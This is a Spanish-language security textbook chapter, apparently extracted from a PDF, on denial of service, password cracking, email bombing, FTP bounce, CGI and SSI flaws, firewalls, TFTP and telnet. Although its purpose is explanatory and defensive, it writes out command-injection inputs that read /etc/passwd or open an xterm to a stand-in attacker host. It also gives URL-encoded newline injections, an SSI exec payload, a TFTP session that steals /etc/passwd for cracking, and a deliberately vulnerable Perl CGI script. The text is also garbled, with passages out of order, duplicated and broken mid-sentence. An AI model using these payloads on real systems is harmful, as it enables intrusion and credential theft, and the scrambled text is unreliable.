4.

TIPOS DE VULNERABILIDADES

ATAQUES

Qu es Denial of service? Denial of service es un tipo de ataque cuya meta fundamental es la de negar el acceso del atacado a un recurso determinado o a sus propios recursos. Ejemplos de este tipo de ataque son:

Impresoras Unidades de cinta Conexiones de red

Tentativas de floodear (inundar) una red.

Tentativas de interrumpir las conexiones entre dos mquinas. Tentativas de evitar que una determinada persona tenga acceso a un servicio; Tentativas de interrumpir un servicio especfico a un sistema o a un usuario; Modos de ataque Ataque asimtrico: ataques que se pueden ejecutar con recursos muy limitados contra un sitio grande y sofisticado. por ejemplo, de clster Windows NT. Tipos de ataques bsicos de negacin de servicios: 1. Consumo de recursos limitados, o no renovables escasos,

2. Destruccin o alteracin de la informacin de configuracin: Una computadora incorrectamente configurada puede no funcionar bien o directamente no arrancar. Un hacker puede alterar o destruir la informacin de configuracin de su sistema operativo, evitando de esta forma que usted use su computadora o red. Ejemplo: Si un hacker puede cambiar la informacin de ruteo de sus routers, su red puede ser deshabilitada. 3. Destruccin o alteracin fsica de los componentes de la red : Se debe resguardar contra el acceso no autorizado a las computadoras, los routers, los racks de cableado de red, los segmentos del backbone de la red, y cualquier otro componente crtico de la red. Prevencin y respuesta Los ataques de Negacin de servicio pueden dar lugar a prdidas significativas de tiempo y dinero para muchas organizaciones, por lo que se recomiendan una serie de medidas: Coloque Access Lists en los routers. Esto reducir su exposicin a ciertos ataques de negacin de servicio Instale patches a su sistema operativo contra flooding de TCP SYN. Esta accin permitir reducir su exposicin a estos ataques aunque no pueda eliminar el riesgo en forma definitiva. Invalide cualquier servicio de red innecesario o no utilizado. Limitar la capacidad de un hacker de aprovecharse de esos servicios para ejecutar un ataque de negacin de servicio. Por ejemplo: chargen, Echo, etc. Implemente sistemas de cuotas. Incluya como parte de su rutina, el examen de su seguridad fsica. Utilice Tripwire o una herramienta similar para detectar cambios en la informacin de configuracin u otros archivos. Trate de utilizar configuraciones de red redundantes Cracking de passwords El objetivo inicial consiste en entrar al server. Para ello, se procede como si se tratase de una mquina remota (telnet). Pero, debido a que se

Las computadoras y las redes necesitan para funcionar ciertos recursos: ancho de banda de la red, espacio de memoria y disco, tiempo de CPU, estructuras de datos, acceso otras computadoras y redes, entre otros. Conectividad: SYN flood: Aprovechamiento de los recursos del otro : Negacin de servicio UDP. Consumo de ancho de banda: ICMP (ping Consumo de otros recursos: los hackers pueden consumir otros recursos que su sistema necesite para funcionar, puede consumir estas estructuras de datos escribiendo un programa o un script que no haga nada pero que cree en varias ocasiones copias de s mismo. Tambin consumir su espacio en disco de otras maneras, por ejemplo: Generar miles de mails (Spam, Bombing. Para ampliar este tema, consultar el prximo). Generar intencionalmente errores que deben ser logueados. Colocar archivos en su disco, utilizando ftp annimo. En general, se puede utilizar cualquier cosa que permita que los datos sean escritos en su disco para ejecutar Hay otros componentes que pueden ser vulnerables a la negacin de servicio y que deben vigilar se. Estos incluyen:

permite el acceso a mltiples usuarios, los sistemas UNIX nos solicitarn un nombre de identificacin acompaado de una clave. El archivo /etc/password Los usuarios que se encuentran dados de alta en el sistema, as como las passwords que emplean, se hallan localizados en el archivo: /etc/password. Lamentablemente para algunos, y afortunadamente para otros, este archivo es el punto ms dbil del sistema. Est compuesto de lneas o registros en las cuales cada lnea se divide en siete campos con dos puntos (:). Descubrir una password El mecanismo que se utiliza para descubrir (no desencriptar) las passwords consiste en efectuar encriptaciones de palabras (posibles passwords) y comparar estas encriptaciones con el original. El xito depende de la calidad del diccionario (archivo que contiene un conjunto de posibles passwords), del programa que se utilice, del CPU y, por supuesto, de nuestra paciencia. Si mediante un bug se obtiene el archivo /etc/passwd, se puede iniciar un ataque de diccionario contra el mismo obtenindose, de este modo, las passwords. Otro tipo de ataque es el de fuerza bruta, que consiste simplemente en realizar toda la combinacin posible de caracteres hasta hallar la password. E-mail bombing y spamming El e-mail bombing consiste en enviar muchas veces un mensaje idntico a una misma direccin, saturando el mail box del destinatario. El spamming, que es una variante del e-mail bombing, se refiere a enviar el e-mail a centenares o millares de usuarios e, inclusive, a listas de inters. El Spamming puede resultar an ms perjudicial si los destinatarios contestan el mail, haciendo que todos reciban la respuesta. El e-mail bombing/spamming se puede combinar con el e-mail spoofing - que altera la identidad de la cuenta que enva el mail -, logrando que sea ms difcil determinar quin est enviando realmente el mail. Detalles tcnicos Cuando se proveen los servicios de e-mail los usuarios son, lgicamente, vulnerables al e-mail bombing y spamming. En efecto, el e-mail spamming es casi imposible de prevenir. Un usuario con una direccin vlida de mail puede realizar " Spam " a cualquier otra direccin de mail, newsgroup, o sistema de BBS. Cuando gran cantidad de mails son dirigidos a un solo sitio, ste puede sufrir denial of

service por prdida de conectividad, caerse el sistema o producirse fallas en el servicio debido a:

Sobrecarga de conexiones de red;

Utilizacin de todos los recursos de sistema disponibles; Llenado del disco como resultado de postings mltiples y de entradas en el syslog. Cmo proceder Deteccin: Si un sistema aparece repentinamente lento (el e-mail es lento o no parece ser enviado o recibido), la razn puede ser que su mailer est intentando procesar una excesiva cantidad de mensajes. Esto puede comprobarse a travs del log de sistema. Reaccin .Es importante: Identificar la fuente del e-mail bomb/spam y configure su router para evitar el acceso de los paquetes entrantes de esa direccin. Puede colocar un access list en el port 25 ( SMTP ) del tipo established para esa direccin. Observar los headers del e-mail para determinar su origen verdadero. Ponerse en contacto con el sitio que usted identific en su revisin con el propsito de alertarlos de la actividad del spammer. Asegurarse de tener la versin mas actualizada del daemon de mail (por ejemplo sendmail) y aumente el grado de debug o log que posea el proceso, para detectar o alertar estas actividades. Tenga la precaucin de vigilar el tamao del archivo de log, que puede crecer considerablemente, si se esta bajo un e-mail-bombing. .Prevencin Desafortunadamente, hasta el momento, no hay manera de prevenir el bombardeo de e-mail o spamming y es imposible predecir el origen del ataque siguiente. Es trivial obtener acceso a listas de inters o acceder a informacin que contenga grandes volmenes de direcciones de e-mail, las que proporcionan al atacante direcciones de destino para el spam. Pueden desarrollarse herramientas internas, que pueden ayudar a reconocer y a responder al e-mail bombing/spamming reduciendo, de esta manera, el impacto de tal actividad. Tales herramientas deben aumentar las capacidades de log y alertar de mensajes que vienen de un mismo lugar en un corto perodo de tiempo. Asimismo, deberan ser capaces de rechazar esos mensajes, o descartarlos. Si un sitio utiliza un nmero pequeo de servidores de e-mail, podra configurarse un firewall para asegurarse de que las conexiones de smtp fuera de su firewall

puedan hacerse solamente a sus hubs de mail y a ninguno de los otros equipos. Aunque esta operacin no prevendr un ataque, reduce al mnimo el nmero de las mquinas disponibles para un ataque basado en SMTP. De este modo, se puede controlar el trfico entrante SMTP y filtrarlo de manera acorde.

Con fines ilustrativos, se presentan seguidamente varios ejemplos de cmo los hackers pueden utilizar el ftp bounce. Scanning de ports Un hacker que desea realizar una port scan contra un sitio puede hacerlo de un server FTP de un tercero , que acta como un puente para el scan. El sitio de la vctima ve la exploracin como procedente del server FTP ms que de la fuente verdadera (el cliente FTP). Bajo algunas circunstancias, esta tcnica ofrece al hacker ms ventajas que ocultar la fuente verdadera de la prueba. Cuando el sitio previsto de la vctima est en la misma subnet que el server FTP server, o cuando no filtra trfico del server FTP , el hacker puede utilizar la mquina del servidor como la fuente del port scan ms que la mquina del cliente, desviando de esta manera los controles de acceso que de otra manera se aplicaran. Bypass de dispositivos bsicos de filtrado de paquetes. Un hacker puede realizar un bypass de un firewall en ciertas configuraciones de red. Por ejemplo, supongamos que un sitio tiene su servidor de FTP annimo detrs del firewall. Usando la tcnica de port scan, un hacker determina que un web server interno en ese sitio est disponible en el acceso 8080, un port normalmente bloqueado por un firewall. Conectndose al server FTP pblico del sitio, el hacker inicia otra conexin entre el server FTP y un port arbitrario, en una mquina no pblica del sitio (por ejemplo el web server interno en el port 8080). Como resultado, el hacker establece una conexin a una mquina que sera protegida de otra manera por el firewall. 4.4.4 - Bypass de dispositivos de filtrado dinmicos Otro problema se refiere a los sitios que tienen firewalls que utilizan filtros dinmicos para protegerse. Los sitios estn abiertos al ataque porque el firewall confa en la informacin que recibe. En este ejemplo, el sitio de la vctima contiene todos sus sistemas detrs de un firewall que utiliza los filtros dinmicos. Una persona en el sitio de la vctima hojea las pginas de la Web y baja un Java applet construido por el hacker. Sin el conocimiento de esa persona, el Java applet abre una conexin de salida de ftp a la mquina del hacker. El applet entonces publica un comando PORT de ftp, ordenando a la mquina del servidor abrir una conexin a, por ejemplo, el port telnet que de otra manera se encontraba protegido detrs del firewall.

Recuerde: no conteste y/o haga un forward de los Spams. De este modo evitar que el problema se propague. 4.4 - Problemas de seguridad en el FTP 4.4.1 - El comando PORT En los ltimos aos, se ha incrementado el debate en torno a los problemas relacionados con el comando PORT del protocolo del FTP. Estos problemas se basan el uso errneo de dicho comando. 4.4.2. - El Protocolo FTP Para entender estos ataques, es necesario tener una comprensin bsica del protocolo FTP. Un cliente abre una conexin al port de control de ftp (21) de un FTP SERVER. De este modo, para que el servidor sea capaz luego de enviar datos de nuevo a la mquina del cliente, una segunda conexin (de datos) debe abrirse entre el servidor y el cliente. Para hacer esta segunda conexin, el cliente enva un comando PORT al servidor. Este comando incluye parmetros que indican al servidor cul IP ADDRESS conectar y qu port abrir en aquella direccin. El servidor luego abre aquella conexin, siendo la fuente de la conexin el port 20 del servidor y el destino el port identificado en los parmetros del comando PORT. El comando PORT se utiliza generalmente slo en el " modo activo " del ftp (por default). No se suele utilizar en modo pasivo (PASV). Debe notarse que los servidores de ftp generalmente implementan ambos modos en ejecucin, y el cliente especifica qu mtodo utilizar. 4.4.3. - El ataque Ftp bounce Conforme con el protocolo FTP, el comando PORT hace que la mquina que lo origina especifique una mquina de destino y un port arbitrarios para la conexin de datos. Sin embargo, esto tambin significa que un hacker puede abrir una conexin a un port del hacker eligiendo una mquina que puede no ser el cliente original. Hacer esta conexin a una mquina arbitraria es hacer un ataque ftp bounce.

Como el firewall de filtros dinmicos examina los paquetes de salida para determinar si alguna accin se requiere de su parte, observa el comando PORT y permite una conexin entrante del server web remoto al port del telnet en la mquina de la vctima. Esta conexin normalmente no es permitida por el firewall; fue permitida en este caso porque el comando PORT fue realizado por el cliente. 4.4.5 - Soluciones Los ataques de los ejemplos demuestran el componente base de la vulnerabilidad: los contenidos del comando PORT del ftp no son tan dignos de confianza mientras estn bajo control de un potencial atacante. El ejemplo del ftp bounce demuestra qu sucede cuando un servidor confa en la informacin. El ejemplo del filtro dinmico demuestra qu sucede cuando un firewall confa en la informacin. Software del Ftp server La mejor solucin al problema del ftp bounce desde la perspectiva de la seguridad es asegurarse de que el software del server FTP no puede establecer conexiones a mquinas arbitrarias. Sin embargo, los sitios que confan en el comportamiento RFC-compliant pueden encontrar que el implementar esta solucin afectar las aplicaciones que ellos utilizan.Por lo tanto, muchos vendedores ofrecen soluciones que permiten al sitio dar servicio de ftp adaptado a las necesidades del cliente . Las implementaciones del vendedor caen en tres grupos: 1) conformidad estricta con funciones del RFC: el comando PORT se puede utilizar para conectar directamente con una mquina de una tercera persona, y sta es la nica funcionalidad permitida. Algunos vendedores que eligen mantener conformidad estricta, han tratado este problema modificando el resto de los servicios de red para rechazar las conexiones que se originaban en el port de datos del ftp (port 20). 2) supresin estricta del comando PORT: el comando PORT puede ser utilizado para conectar con el cliente de origen, y sta es la nica funcionalidad permitida. 3) comportamiento variable del comando PORT: el comando PORT se puede utilizar en las dos formas descriptas, siendo una la forma por default. El cambiar entre ellas se logra generalmente con un parmetro en la lnea de comando. Se debe tener cuidado de verificar cul es el valor por default. Asimismo, se debe tener conciencia sobre la categora en que se halla el software del server. La recomendacin es utilizar la opcin 2, o la opcin 3 con la supresin habilitada.

Configuracin del Ftp server Algunos de los ataques ftp bounce descriptos confan en unas o ms mquinas del servidor (dependiendo del ataque) permitiendo el upload de archivos va ftp (generalmente FTP annim). Su sitio debe ofrecer recursos annimos de upload solo si es absolutamente necesario. Incluso luego, usted debe configurar cuidadosamente el rea entrante. Configuracin de Red Hay algunas cosas a tener presente al configurar las fronteras de la red, esto es, los routers con access-lists y los firewalls. Los sitios deben asegurarse de que se disee cuidadosamente la topologa de red de modo que los lmites eficaces del trfico existan entre los sistemas que ofrecen niveles distintos del servicio. Por ejemplo, un sitio tiene tpicamente un servicio de FTP Anonymous, servicio del Web, y un hub entrante de correo electrnico. Una buena prctica de seguridad consiste en separar las mquinas que proporcionan estos servicios externos de las que realizan servicios internos. Es importante tener lmites fuertes en la red, preferiblemente firewalls, entre estos dos conjuntos de mquinas. Por ejemplo, los sitios que tienen un server FTP que permite el comando PORT para establecer conexiones a las mquinas de un tercero deben bloquear el trfico entre el server FTP y las mquinas que ofrecen servicios que confan en el hostname o la direccin IP para la autenticacin. Los ejemplos de tales servicios son rlogin, rsh y NFS. Mientras que un firewall o un filtering router debe prevenir siempre el acceso externo directo a tales servicios, debe tambin filtrar el trfico de un server FTP interno que se comporte de esta manera. Esto advierte al server FTP que est siendo utilizado como una mquina de relay para atacar protocolos con mecanismos dbiles de autenticacin basados en el hostname o la direccin IP. Los sitios que usan firewall de filtrado dinmico de paquetes dinmico necesitan tomar medidas adicionales para asegurarse de que los comandos PORT de terceros sean bloqueados por el firewall. 4.4.6 - Otros problemas del FTP El FTP y los programas que lo implementan son reales problemas para los encargados de seguridad de los sistemas. Veamos una lista parcial de los mismos: El protocolo, como hemos visto, usa dos conexiones TCP, complicando el trabajo de controlarlo a travs de un firewall. En la mayora de los casos un control de una

conexin saliente entrante de datos.

requiere

una

conexin

El demonio ftpd corre inicialmente como root, ya que normalmente procesa un login a determinada cuenta, incluyendo el procesamiento de la password. Peor aun, no puede dejar su privilegio despues del login, el protocolo requiere conexin al port 20 el cual est en el rango privilegiado. Histricamente, han habido bugs en la implementacin del demonio, lo cual ha producido grandes problemas de seguridad

El FTP y los programas que lo implementan son reales problemas para los encargados de seguridad de los sistemas. Veamos una lista parcial de los mismos: El protocolo, como hemos visto, usa dos conexiones TCP, complicando el trabajo de controlarlo a travs de un firewall. En la mayora de los casos un control de una conexin saliente requiere una conexin entrante de datos. El demonio ftpd corre inicialmente como root, ya que normalmente procesa un login a determinada cuenta, incluyendo el procesamiento de la password. Peor aun, no puede dejar su privilegio despues del login, el protocolo requiere conexin al port 20 el cual est en el rango privilegiado. Histricamente, han habido bugs en la implementacin del demonio, lo cual ha producido grandes problemas de seguridad

Por otra parte, el FTP annimo se ha convertido en un standard de internet para distribuir software, documentos, etc. No hay duda que es un servicio til, pero debe ser administrado Configuracin de Red Hay algunas cosas a tener presente al configurar las fronteras de la red, esto es, los routers con access-lists y los firewalls. Los sitios deben asegurarse de que se disee cuidadosamente la topologa de red de modo que los lmites eficaces del trfico existan entre los sistemas que ofrecen niveles distintos del servicio. Por ejemplo, un sitio tiene tpicamente un servicio de FTP Anonymous, servicio del Web, y un hub entrante de correo electrnico. Una buena prctica de seguridad consiste en separar las mquinas que proporcionan estos servicios externos de las que realizan servicios internos. Es importante tener lmites fuertes en la red, preferiblemente firewalls, entre estos dos conjuntos de mquinas. Por ejemplo, los sitios que tienen un server FTP que permite el comando PORT para establecer conexiones a las mquinas de un tercero deben bloquear el trfico entre el server FTP y las mquinas que ofrecen servicios que confan en el hostname o la direccin IP para la autenticacin. Los ejemplos de tales servicios son rlogin, rsh y NFS. Mientras que un firewall o un filtering router debe prevenir siempre el acceso externo directo a tales servicios, debe tambin filtrar el trfico de un server FTP interno que se comporte de esta manera. Esto advierte al server FTP que est siendo utilizado como una mquina de relay para atacar protocolos con mecanismos dbiles de autenticacin basados en el hostname o la direccin IP. Los sitios que usan firewall de filtrado dinmico de paquetes dinmico necesitan tomar medidas adicionales para asegurarse de que los comandos PORT de terceros sean bloqueados por el firewall. 4.4.6 - Otros problemas del FTP

Por otra parte, el FTP annimo se ha convertido en un standard de internet para distribuir software, documentos, etc. No hay duda que es un servicio til, pero debe ser administrado 50 con sumo cuidado. La primera regla es que ningn archivo o directorio en el area de FTP annimo debe ser poseida por el login ftp , ya que el FTP annimo corre con esa identificacin de usuario. La siguiente regla es evitar colocar un archivo real /etc/passwd en el area de FTP annimo. Hay que crear aqu un /etc/passwd dummy, con cuentas inexistentes y sin passwords reales encriptadas. En muchos caso se ha colocado aqu el /etc/passwd real, dando servido al hacker las passwords encriptadas para as hacer un ataque de diccionario. Crear o no un directorio pblico de acceso read/write es tema de controversia. No hay duda que es til hacerlo, pero se puede abusar fcil de ello. Uno puede encontrarse con su server convertido en repositorio de software pirata, por ejemplo. Este repositorio puede ser temporario o permanente, en el primer caso, hackers pueden usar su sitio como lugar de trnsito, consumiendo sus recursos. 4.5 - Seguridad en redes WAN 4.5.1- Seguridad en WWW En este apartado se vern las vulnerabilidades ms comunes encontradas en los servidores de Web. Va WWW, el demonio httpd se ha convertido rpidamente en una de las primeras "puntas de ataque" de los hackers. Es comn ver reportes de los CERT que informan

vulnerabilidades tales como el PHF (servicio de directorio White pages ) en muchos servers, y las hay menos conocidas, como los scripts "query", y "prueba-cgi ". Existen dos caras de seguridad del webserver, una es proteger el sistema operativo en s mismo de ser atacado va WWW, la otra es proteger un Website en s mismo de acceso no autorizado. Atacar el sistema operativo va WWW implica generalmente trampear un cgi script o lograr que el webserver haga algo que no fue pensado que haga, como por ejemplo dar al hacker acceso al shell del host, que ese hacker ejecute comandos arbitrarios en l , o le provea informacin til para lograr esos objetivos. Es obvio que los datos provistos a cualquier cgi script va un form deben ser probados para su validez por una razn u otra, y una de esas razones indudablemente es la seguridad. Dependiendo de lo que el script vaya a hacer, la entrada aparentemente inocua de informacin puede tener graves consecuencias. Por ejemplo, consideremos el siguiente script en perl en el cual se realiza un finger al usuario que se indico en el campo de entrada del form y vuelvan los resultados al web browser ( Script encontrado frecuentemente en websites ): 51 #!/usr/local/bin/per1 $|=1; require 'cgi-lib.pl'; &ReadParse; print &PrintHeader; open(IN, "/usr/bin/finger $in{'user_id'} |"); @stuff=; foreach(@stuff) { print; } exit; e ingresamos como usuario lo siguiente: kaiser;/bin/cat / etc/passwd Si no se posee soporte de shadow passwords, se est en graves problemas. Lo precedente constituye un ejemplo muy bsico de la forma que un " password grab podra tomar. El tema es que el string podra contener cualquier comando arbitrario, como por ejemplo: kaiser;/usr/openwin/xterm hackerz.R.US.com display

Esto abrira un xterm en su consola, y adems su shell tendra los mismos permisos que el demonio del httpd. Por supuesto, el ejemplo antedicho no control si la entrada en el form era un usuario o una bomba atmica, y dondequiera que uno vaya va a encontrar que en la documentacin o en los ejemplos de manejo de input cgi se explica siempre que hay que realizar un escape de cualquier meta-character de relevencia al shell con backslashes. Sin embargo, la situacin fue calamitosa debido a que muchos ejemplos omitieron un pequeo carcter especial, a saber el newline (0x0A). Las versiones viejas del httpd del NCSA y Apache (1,0,3) tenan una rutina de C, escape_shell_cmd() en su distribucin que tena este defecto. Por lo tanto, cualquier persona que haca uso de la funcin usando el mdulo util.c compil esa vulnerabilidad en sus cgi scripts. Una manera de explotar este bug es con el string: http://somewhere.com/cgibin/somescript? fakedata%0A/bin/cat%20/etc/passwd o por ejemplo utilizando como string: fakedata%0a/usr/openwin/xterm%20-display %20hackerz.R.US.com 52 Si se descubre en el log de acceso cosas como: nserv.tsa.de - - [13/Dec/1996:00:03:13 -0500] \ "GET /cgi-bin/phf?Qname=asd%0acat %20/etc/passwd HTTP/1.0" 200 1467 www3-leav.army.mil - - [28/Dec/1996:10:04:59 -0500] \ "GET /cgi-bin/phf/?Qalias=x%ff/bin/cat %20/etc/passwd" 200 ld49-037.compuserve.com [12/Jan/1997:06:54:22 -0500] \ -

"GET /cgi-bin/phf?Qalias=x%0a/usr/bin/id HTTP/1.0" 200 significa que hackers han intentado ya esto en su sistema. El problema adems est en que al migrar a versiones nuevas muchas veces se copia el rbol de binarios cgi viejos encima del nuevo, arrastrando este bug. Por otra parte, el shell bash tiene un problema comparable: el decimal 255 es interpretado como separador de comandos.

Durante los 2 ltimos aos pasados , en los cuales se extendi el uso de documentos dinmicos , otras vulnerabilidades entraron en escena En primer trmino, la manera mas fcil para los webservers de construir documentos on fly , era habilitar los Server Side Includes (SSIs). En algunos casos esto signific una extensin nueva de archivo, como shtml , en otros signific permitir SSIs para cada documento en el servidor o en un rbol dado del documento. En cualquier caso, permitir SSs permite un exec. Un uso legtimo tpico de un exec tag es: Esta pgina ha sido visitada <! -- #exec cgi="/cgi-bin/counter " -- > veces Pero imaginemos un sistema de mensajera de alguna clase basado en HTML, por ejemplo un guestbook que toma el input y construye un doc HTML. Alguien entra y deja: Hey! Que buen lugar, volver seguido ; -) <! -- #exec cmd="/bin/cat /etc/passwd " -- > Si no se est analizando los campos ingresado nuevamente tenemos un password grab. O podra introducirse cualquier cosa que el server pudiera ejecutar. Y adems sera mucho peor si su webserver se ejecuta como root. 53 Las ltimas versiones de Apache y Netscape proporcionan como opcin invalidar los SSIs de tal manera que se pueden habilitar sin el " exec ". Muchos de estos problemas se pueden reducir permitiendo el chrooting del web server, aunque a pesar de los aumentos que se hacen de seguridad, estos no son de ninguna forma un ejercicio trivial. Hay otros aspectos a la seguridad del webserver adems de hackear el s/o. Incluso si se es seguro en este aspecto, est el website en si mismo. Ms y ms de ellos requieren el acceso asegurado para una razn u otra. Mientras que los websites realizan la transicin de ser frees a pagos y mezclan sus intranets con los extranets, las restricciones de acceso entran en juego. Cualquier archivo de passwords usado para la autenticacin del Web debe estar fuera del rbol de documentos. En efecto, muchos administradores lo dejaban en el rbol pensando que al haber un index file este archivo sera invisible. Grave error: El archivo se puede adivinar, en primer trmino, y adems han surgido herramientas que permiten

conseguir el listado del webserver aun cuando el index file est presente. De esta manera, obtenido el archivo de passwords, es fcil correr el crack y descifrarla.

Tambin se debe estar prevenido que dependiendo de lo que hace su website, y como est implementado, puede haber otros accesos no autorizados que el server web estndar no atrapar. Un buen ejemplo de esto son del cgi wrappers tales como PHP/FI o W3-mSQL. Por ejemplo, si alguien sabe el nombre de un documento al que se quiere tener acceso en el directorio protegido ( index.html ) puede conseguirse usando: http://somewhere.com/cgibin/php.cgi/secret/index.html En el caso de PHP/FI, se puede evitar esto definiendo PATTERN_RESTRICT en php.h antes de compilar, as que solamente cargar los archivos que terminan en la extensin .phtml. 54 4.5.2- Tipos de Firewalls Tipos de cortafuegos Nivel de aplicacin de pasarela Aplica mecanismos de seguridad para aplicaciones especficas, tales como servidores FTP y Telnet. Esto es muy eficaz, pero puede imponer una degradacin del rendimiento. Circuito a nivel de pasarela Aplica mecanismos de seguridad cuando una conexin TCP o UDP es establecida. Una vez que la conexin se ha hecho, los paquetes pueden fluir entre los anfitriones sin ms control. Permite el establecimiento de una sesin que se origine desde una zona de mayor seguridad hacia una zona de menor seguridad. Cortafuegos de capa de red o de filtrado de paquetes Funciona a nivel de red (nivel 3) de la pila de protocolos (TCP/IP) como filtro de paquetes IP. A este nivel se pueden realizar filtros segn los distintos campos de los paquetes IP: direccin IP origen, direccin IP destino, etc. A menudo en este tipo de cortafuegos se permiten filtrados segn campos de nivel de transporte (nivel 4) como el puerto origen y destino, o a nivel de enlace de datos (nivel 2) como la direccin MAC. Este es uno de los principales tipos de cortafuegos. Se considera bastante eficaz y transparente pero difcil de configurar. Cortafuegos de capa de aplicacin

Trabaja en el nivel de aplicacin (nivel 7), de manera que los filtrados se pueden adaptar a caractersticas propias de los protocolos de este nivel. Por ejemplo, si se trata de trfico HTTP, se pueden realizar filtrados segn la URL a la que se est intentando acceder. Un cortafuegos a nivel 7 de trfico HTTP suele denominarse proxy, y permite que los computadores de una organizacin entren a Internet de una forma controlada. Un proxy oculta de manera eficaz las verdaderas direcciones de red. Cortafuegos personal Es un caso particular de cortafuegos que se instala como software en un computador, filtrando las comunicaciones entre dicho computador y el resto de la red. Se usa por tanto, a nivel personal. 55 Ventajas de un cortafuegos Establece perimetros confiables. Protege de intrusiones.- El acceso a ciertos segmentos de la red de una organizacin slo se permite desde mquinas autorizadas de otros segmentos de la organizacin o de Internet. Proteccin de informacin privada.- Permite definir distintos niveles de acceso a la informacin, de manera que en una organizacin cada grupo de usuarios definido tenga acceso slo a los servicios e informacin que le son estrictamente necesarios. Optimizacin de acceso.- Identifica los elementos de la red internos y optimiza que la comunicacin entre ellos sea ms directa. Esto ayuda a reconfigurar los parmetros de seguridad.

datos sensibles en medios fsicos de almacenamiento (discos, memorias, etc.) y sustraerlas del edificio. El cortafuegos no puede proteger contra los ataques de ingeniera social. El cortafuegos no puede proteger contra los ataques posibles a la red interna por virus informticos a travs de archivos y software. La solucin real est en que la organizacin debe ser consciente en instalar software antivirus en cada mquina para protegerse de los virus que llegan por cualquier medio de almacenamiento u otra fuente. El cortafuegos no protege de los fallos de seguridad de los servicios y protocolos cuyo trfico est permitido. Hay que configurar correctamente y cuidar la seguridad de los servicios que se publiquen en Internet. Polticas del cortafuegos Hay dos polticas bsicas en la configuracin de un cortafuegos que cambian radicalmente la filosofa fundamental de la seguridad en la organizacin: Poltica restrictiva: Se deniega todo el trfico excepto el que est explcitamente permitido. El cortafuegos obstruye todo el trfico y hay que habilitar expresamente el trfico de los servicios que se necesiten. 56 Poltica permisiva: Se permite todo el trfico excepto el que est explcitamente denegado. Cada servicio potencialmente peligroso necesitar ser aislado bsicamente caso por caso, mientras que el resto del trfico no ser filtrado. La poltica restrictiva es la ms segura, ya que es ms difcil permitir por error trfico potencialmente peligroso, mientras que en la poltica permisiva es posible que no se haya contemplado algn caso de trfico peligroso y sea permitido por omisin. Historia de los cortafuegos El trmino "firewall / fireblock" significaba originalmente una pared para confinar un incendio o riesgo potencial de incendio en un edificio. Ms adelante se usa para referirse a las estructuras similares, como la hoja de metal que separa el compartimiento del motor de un vehculo o una aeronave de la cabina. La tecnologa de los cortafuegos surgi a finales de 1980, cuando Internet era una tecnologa bastante nueva en cuanto a su uso global y la conectividad. Los predecesores de los cortafuegos para la seguridad de la red fueron los routers utilizados a finales de 1980, que mantenan a las redes separadas unas de otras.

Limitaciones de un cortafuegos Las limitaciones se desprenden de la misma definicin del cortafuegos: filtro de trfico. Cualquier tipo de ataque informtico que use trfico aceptado por el cortafuegos (por usar puertos TCP abiertos expresamente, por ejemplo) o que sencillamente no use la red, seguir constituyendo una amenaza. La siguiente lista muestra algunos de estos riesgos: Un cortafuegos no puede proteger contra aquellos ataques cuyo trfico no pase a travs de l. El cortafuegos no puede proteger de las amenazas a las que est sometido por ataques internos o usuarios negligentes. El cortafuegos no puede prohibir a espas corporativos copiar

La visin de Internet como una comunidad relativamente pequea de usuarios con mquinas compatibles, que valoraba la predisposicin para el intercambio y la colaboracin, termin con una serie de importantes violaciones de seguridad de Internet que se produjo a finales de los 80: Clifford Stoll, que descubri la forma de manipular el sistema de espionaje alemn. Bill Cheswick, cuando en 1992 instal una crcel simple electrnica para observar a un atacante. En 1988, un empleado del Centro de Investigacin Ames de la NASA, en California, envi una nota por correo electrnico a sus colegas que deca: "Estamos bajo el ataque de un virus de Internet! Ha llegado a Berkeley, UC San Diego, Lawrence Livermore, Stanford y la NASA Ames." El Gusano Morris, que se extendi a travs de mltiples vulnerabilidades en las mquinas de la poca. Aunque no era malicioso, el gusano Morris fue el primer ataque a gran escala sobre la seguridad en Internet; la red no esperaba ni estaba preparada para hacer frente a su ataque. 57 TFTP El Trivial File Transport Protocol ( TFTP ) es un mecanismo sencillo de file transfer basado en UDP. Este protocolo no tiene autenticacin, constituyendo un potencial problema de seguridad. Es usado frecuentemente para bootear estaciones de trabajo X11, o para bootear routers desde sistemas unix, por ejemplo. El servicio TFTP, correctamente configurado, restringe el file transfer a uno o dos directorios, tpicamente /usr/local/boot o /etc/tftpboot, segn la variante de UNIX utilizada. Hasta no hace demasiado tiempo, la mayora de los vendedores liberaban su software con acceso irrestricto al TFTP. Esto hacia el trabajo de los hackers sencillo: $ tftp victima.com.ar tftp> get /etc/passwd /tmp/passwd Received 4670 bytes in 0.8 seconds tftp> quit $ crack </tmp/passwd Un ataque de diccionario contra el /etc/passwd da normalmente con el 25% de las passwords.

Se recomienda NO HABILITAR el tftp a menos que sea estrictamente necesario. Si se lo hace, verificar que este correctamente configurado, para enviar solo los archivos correctos a solo los clientes autorizados. TELNET TELNET provee acceso de terminal a un sistema. El protocolo incluye previsiones para soportar varios seteos de terminal como ser raw mode, eco de caracteres, etc. Generalmente, el demonio de telnet llama al programa login para autenticar al usuario e iniciar la sesin. El mismo provee un nombre de cuenta y una password para el login. Una sesin de telnet puede ocurrir entre dos mquinas de la misma organizacin o confiables, en ese caso se puede utilizar un secure telnet para encriptar la sesin completa, protegiendo la password y la sesin completa. Pero en la mayora de los casos, la mayora de las sesiones de telnet vienen de sistemas no confiables. Es decir, no podemos confiar ni en el sistema operativo que hace telnet al nuestro, ni en las redes que intervienen en el proceso. La password y la sesin entera son fcilmente visible para los ojos de un espa, tpicamente usando sniffers. 58 Una tcnica comn de hackeo es pinchar el programa cliente de telnet, logrando que registre los nombres de usuario y password, e inclusive la sesin entera. De todas forma, si la red est bajo sniffing, es extremadamente sencillo obtener las passwords que circulan por sesiones de telnet. La mejor defensa para este tipo de ataque es el esquema de password de nica vez. Una de las implementaciones de este esquema consiste en que el usuario disponga de un dispositivo programado mediante una clave secreta. El sistema que acepta el login enva un challenge, que el usuario digita en su dispositivo. Esto le devuelve la password adecuada para el cdigo challenge enviado. Pero esa pasword que circulo por la red es vlida solo para esa sesin, el hacker, si observo la sesin, deber descifrar cual es el algoritmo utilizado para que en base al challenge variable y una clave secreta que no circulo por la red se obtenga la password de nica vez. 4.7- Los comandos r Los comandos r provienen del sistema de autenticacin del UNIX BSD. Un usuario puede realizar un rlogin a una mquina remota sin ingresar password si el criterio de autenticacin es el correcto. Estos criterios consisten en:

